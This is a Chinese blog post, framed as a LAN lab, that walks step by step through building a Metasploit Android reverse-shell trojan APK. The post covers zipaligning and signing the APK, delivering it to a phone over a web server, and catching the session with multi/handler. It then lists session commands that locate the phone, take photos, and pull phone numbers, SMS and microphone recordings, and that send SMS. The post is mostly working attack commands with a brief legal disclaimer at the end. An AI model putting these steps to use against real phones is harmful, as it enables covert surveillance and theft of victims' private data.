MSF手机渗透实验

已于 2022-10-23 00:26:03 修改
阅读量4.2k 收藏 74
点赞数 7
分类专栏: msf渗透 文章标签: 学习
于 2022-10-22 12:52:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63204687/article/details/127458994
版权

一、准备阶段

  本实验是在kail里面使用msf工具生成一个Android木马程序,然后客户端进行下载,从而渗透。

实验范围为局域网的手机,即入侵的手机要与电脑处于同一个网段,这就需要将虚拟机设置为桥接模式,并手动配置ip。

1.查看虚拟机ip

f994a04cfa1a408d865986148dfc0b01.png

此时手机的ip段为192.168.43.0段故需要更改虚拟机ip

vim /etc/network/interfaces

更改静态ip、网关等 e820f6761f644b0298b4f2fe2cc963fd.png

重启虚拟机网络配置

systemctl restart networking

查看ip地址 90313f976afc400b87c87732e3ee6746.png

 连通性测试

fe54e37ee5e6436fafb61a29c1ce24c9.png

 二、生成Android木马程序

1.获取apk

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.38 lport=5555 R>zzh.apk

其中lhost后面是虚拟机端的ip地址,lport也是虚拟机的端口号(256以上可以随便设置,尽量大点)。后面跟的zzh.apk为生成的Android程序名称。

35e457954abc411db3221cc0a3cee965.png

2.对应用进行对齐优化

a.先下载zipalign工具

8d928cc052ad4142864d53227edc3460.png

b.使用工具输入命令进行对齐优化

zipalign -v 4 zzh.apk GRIT.apk

zipalign -v 4 原Apk 优化完Apk地址

输出结果为如下图:

 4f31921616e940b8ad29b3709f9f1050.png

此时该路径下应该有两个apk文件一个是最初始的zzh.apk,一个是对齐后的GRIT.apk

ef1ba62b041548909ee0d8c1379474a8.png

 3.生成密钥对

keytool -genkey -v -keystore zzh.keystore -alias zzh -keyalg RSA -keysize 2084 -validity 365

 a.解析

-alias 产生别名(zzh)
-keystore 指定密钥库的名称(就像数据库一样的证书库,可以有很多个证书,cacerts这个文件是jre自带的,你也可以使用其它文件名字,如果没有这个文件名字,它会创建这样一个这里为zzh.keystore)
-v 显示密钥库中的证书详细信息
-validity 指定创建的证书有效期多少天(365)
-keysize 指定密钥长度(2084)

-keyalg RSA(算法)

b. 输出结果

47e7370e407440a792b1e1f150642e87.png

4.对apk签名

a.下载apksigner工具

94b3d3cadebf482ea003842d843ec724.png

b.使用工具签名

apksigner sign --ks zzh.keystore --ks-key-alias zzh GRIT.apk

c.解析

apksigner sign --ks (签名地址zzh.keystore) --ks-key-alias (别名zzh) (待签名的apk地址)

d.结果

ed50b00c8a0c4f42a6894a5c1bbbc754.png

此处需要输入密码为生成密钥对时设置的密码 。

三、下载GRIT.apk

将上面的设置完成后就可以将GRIT.apk下载到手机上进行实验了

1.直接通过发送方法发送到手机上

2.手机访问ip下载

a.在此处插入一行

f00b982c6e6a405da47d020cd8c0e5ec.png

 b.开启相关服务

service apache2 start

c.手机访问ip下载

5e18136aa50d40c0954ee15fee584d6f.png5e183f1c9b08441baea1891c13ee47dd.jpege556a4114d8a4c02b0d0cd750550f5b9.pngf29f1978ba2e4629ad0defd540c51e24.png

 最后的结果弹出版本旧,哈哈,到这步手机部分已经结束了....

 四、启动msfconsole

1.加载模块

use exploit/multi/handler

2.设置payload监听

set payload android/meterpreter/reverse_tcp

3.设置options

set lhost 192.168.43.38
set lport 5555

ead0edfacaea465c9f056101c7304593.png

五、启动

1.run

c14c5d489d6b428d98540e640923e6c3.png

2.点击手机软件

c9077f9f71e34b8296ba2fc6b5182bf0.png

六、检验

1.定位

59f99ad176db4fabb288c9e86ba91035.png

2.拍照

95de0046aa7b4521b09e8f8cd3cccb2f.png

b4990130b3114f14b5a177bbec36a994.jpeg

3.手机电话号码

3c8a6b014ac9428c8c27a4f3e62abaa5.png

4.短信

80c86d2707314c95854cd3db363e79ab.png

5.录音

record_mic录音加上-d参数指定录音时长(秒)

6.发送信息

send_sms -d 号码 -t "信息"

 六、结语

  根据国家安全法,非法入侵一定是犯法的,此次实验主要是告诉我们以后看到无视风险安装和退出安装,记得一定把控住点退出安装啊。

『Knight』
关注
  • 7
    点赞
  • 74
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
Kali利用MSF渗透安卓手机_kali入侵安卓手机(1)
2401_84519960的博客
05-01 760
由于文章篇幅原因,我只把面试题列了出来,详细的答案,我整理成了一份PDF文档,这份文档还包括了还有高级架构技术进阶脑图、Android开发面试专题资料,高级进阶架构资料 ,帮助大家学习提升进阶,也节省大家在网上搜索资料的时间来学习。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化学习资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
Kali Linux利用MSF入侵安卓手机(零基础版超详细)
热门推荐
m0_74914256的博客
05-05 1万+
Kali Linux利用MSF入侵安卓手机新手下白版最详细,查看对方手机系统信息,查看对方手机安装哪些app文件,远程控制对方手机拍摄一张照片,远程控制对方手机开起视频聊天,实时查看对方手机的信息,获取对方手机的通讯录,实时获取对方手机GPS定位
《Metasploit渗透测试指南》命令参考列表
weixin_38169786的博客
08-09 835
1.MSF终端命令 show exploit 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击模块。 search name 查找metasploit框架中的所有渗透攻击和其他模块。 info 展示出制定渗透攻击或模...
Linux的内网渗透入门教程:第一节 通过arp欺骗进行网关劫持,截获别人手机的图片(VMware环境)
weixin_42234345的博客
02-01 3933
一、引言 这是本人第一次写博客,据我一位帅气的大牛学长说,写博客会让人上瘾,所以我试试~ 二、准备工作 首先,你需要一个Kali环境,并且熟知Linux的操作。(无此基础者请将鼠标移动至浏览器右上角的小红叉,然后单击~) 然后,检查系统是否已安装arpspoof、nmap、driftnet。如果没安装的话,用apt-get或者yum之类的装一下。 三、VM的网络连接设置 VM的网络连接分成三种:桥...
[一颗花生](仅供学习)纯手工注入msf安卓木马实现捆绑。
2301_77111744的博客
07-01 795
【[一颗花生](仅供学习)纯手工注入msf安卓木马实现捆绑。-- 连接WLAN网络和断开连接 -->-- 新建/修改/删除通话记录 -->-- 读取手机状态和身份 -->-- 查看WLAN连接 -->-- 接收讯息(短信) -->-- 请求忽略电池优化 -->-- 修改您的通讯录 -->-- 拍摄照片和视频 -->-- 查看网络连接 -->-- 修改系统设置 -->-- 读取通话记录 -->-- 防止手机休眠 -->-- 读取联系人 -->-- 发送短信 -->-- 拨打电话 -->
利用MSF攻击Android
qq_45746768的博客
07-08 3808
利用Metasploit攻击Android
MSF生成木马及木马的简单使用
爱喝水的仙人树的博客
11-03 8829
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
MSF安卓手机渗透.md
12-07
MSF安卓手机渗透.md
kali 渗透msf
11-14
kali渗透测试利器
msf内网渗透
10-29
在IT安全领域,尤其是渗透测试和网络攻防中,“msf内网渗透”是一个关键话题,涉及到了Metasploit框架(简称MSF)在内部网络中的应用与实践。这一过程通常包括了渗透测试前的环境准备、利用MSF生成有效载荷、设置web...
渗透学习总结之利用木马渗透攻击安卓手机
ABABC1234的博客
07-09 409
利用exploit/multi/handler渗透攻击安卓手机实验过程
第六章:iOS恶意软件和后门 ——6.5 针对iOS使用Metasploit
vmdig.com
08-25 2122
。。。
MSF模拟渗透测试之攻击Android
lza20001103的博客
04-09 6948
MSF渗透测试系列之攻击Android
metasploit、msfvenom生成木马入侵电脑及手机
xj28555的博客
08-09 1546
简介 msfvenom msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件 查看所有--payload的模块 msfvenom -l payloads 文件后缀名-f的格式 msfvenom --help-formats metasploit Metasploit Framework(MSF)是一款开源安全漏洞
使用kali的msf渗透安卓手机
r7rrtyrytr的博客
01-30 3567
#1# 生成安卓手机木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=(本机ip) LPORT=4444 R > /home/kali/Desktop/111.apk apk生成后会保存在桌面上。 #2# 加载模块 use exploit/multi/handler #3# 选择Payload set payload android/meterpreter/reverse_tcp #4# 查看参数并设置 show o
5 分钟,使用内网穿透快速实现远程手机桌面!
AirPython的博客
04-13 6501
点击上方 “AirPython”,选择 “加为星标”第一时间关注 Python 原创干货!1. 前言大家好,我是安果!不知道大家有没有下面这些经历,比如父母在操作智能手机时遇到一些问题,在向我们求助时,我们借助语音、视频都没法在短时间内帮助他们解决问题又比如你想远程管控儿童使用手机的内容,控制他们使用手机娱乐的时长这时候,如果我们能远程控制手机设备,这一切都能迎刃而解!之...
【失败日记】手机内网穿透
行码棋
03-05 7616
【失败日记】内网穿透 自从在旧的手机上下载了linux系统,我便开始不断设想,企图把手机变成linux服务器,碍于之前就对手机进行过改装linux服务器的操作,但是之前搞了一天左右也没有任何成果,反而是挫败了自己的内心。之前就是因为手机没有办法root,所以linux无法用linux deploy安装。 现在无意中在某个群聊中看到了手机端的linux子系统,所以便开始了今天的作死之路。 linux子系统 手机端下载zero termux按照一个网址的教程进行安装,刚开始看着手机出现众多字符的页面感到很兴奋,
msf渗透linux
最新发布
09-07
MSF (Metasploit Framework) 是一个开源的渗透测试工具,用于评估和保护计算机系统的安全性。它提供了一系列的模块和工具,可以用于漏洞扫描、漏洞利用、远程控制和后渗透等活动。 在使用 MSF 进行 Linux 渗透测试...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

『Knight』

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值